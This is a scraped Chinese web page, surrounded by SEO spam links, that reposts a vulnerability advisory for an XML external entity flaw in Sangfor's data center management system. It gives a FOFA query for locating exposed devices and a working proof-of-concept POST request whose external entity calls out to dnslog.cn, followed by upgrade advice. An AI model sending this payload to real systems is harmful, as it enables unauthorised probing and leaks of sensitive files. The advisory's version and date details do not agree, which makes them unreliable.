当前位置: 首页 > news >正文

免费自助建站工具百度收录提交网址

免费自助建站工具,百度收录提交网址,wordpress分类法多重筛选并排序,物业公司企业文化建设0x01 产品简介 深信服数据中心管理系统DC为AC的外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。 0x02 漏洞概述 深信服数据中心管理系统DC存在XML外部实…

0x01 产品简介

   深信服数据中心管理系统DC为AC的外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。

0x02 漏洞概述

  深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析,攻击者可以利用该漏洞进行XML注入攻击,获取系统敏感信息。

0x03 影响范围

    v6.1及以下版本

0x04 复现环境

FOFA: "SANGFOR 数据中心"

0x05 漏洞复现 

PoC

POST /src/sangforindex HTTP/1.1
Host: your-ip
Content-Type: text/xml<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [<!ENTITY rt SYSTEM "http://dnslog.cn">
]>
<xxx>
&rt;
</xxx>

验证

0x06 修复建议

规避措施

将设备端口收缩内网,可削减漏洞被利用风险。

升级方案

2016年4月发布的数据中心管理系统v11.0及以上版本已修复,受影响用户可通过升级版本,完成对漏洞的修复。可拨打深信服漏洞专属修复热线400-005-5530获取或联系当地服务人员。

http://www.ds6.com.cn/news/31604.html

相关文章:

  • 我做的网站不知道网站怎么办事件营销的经典案例
  • 网站代理备案步骤淘宝客推广一天80单
  • 门户网网站seo怎么做网络营销是什么专业
  • 网站开发遇到的难点软文广告是什么
  • 网站备案地点百度seo快速
  • 网站推送怎么做好用的网站推荐
  • 工厂的网站在哪里做的住房和城乡建设部
  • 公司网站做地图地址网站建设杭州
  • 南宁市网站建设价格关键词林俊杰mp3
  • 网站开发版本号开网店怎么推广运营
  • vue做社区网站怎样宣传网站
  • 网站制作公司seo外贸推广
  • 理财网站如何做推广如何制作简易网站
  • 做h的小说网站有哪些免费职业技能培训网站
  • 鹰潭房产网站建设全能搜
  • copyright 个人网站站长之家下载
  • 网络营销类型有哪些上海seo服务外包公司
  • wordpress copyright浙江短视频seo优化网站
  • 在线建设网站 源代码百度投诉中心热线
  • 扶风网站开发网络推广方式有哪几种
  • 网站怎么才能被百度收录服装市场调研报告范文
  • wordpress dz 整合seo外包软件
  • 外贸b2b网站大全一b2b平台网络营销方式方法
  • 360浏览器屏蔽某网站怎么做公司网站建设公司
  • 香港网站空间申请网站如何进行优化
  • 政府门户网站建设经验汇报材料百度下载app下载
  • 个人个性网页界面设计网站搜索优化公司
  • 网站开发设计思想网站推广线上推广
  • 分类信息网站怎么做流量app网站
  • 织梦后台怎么加自己做的网站北京seo优化诊断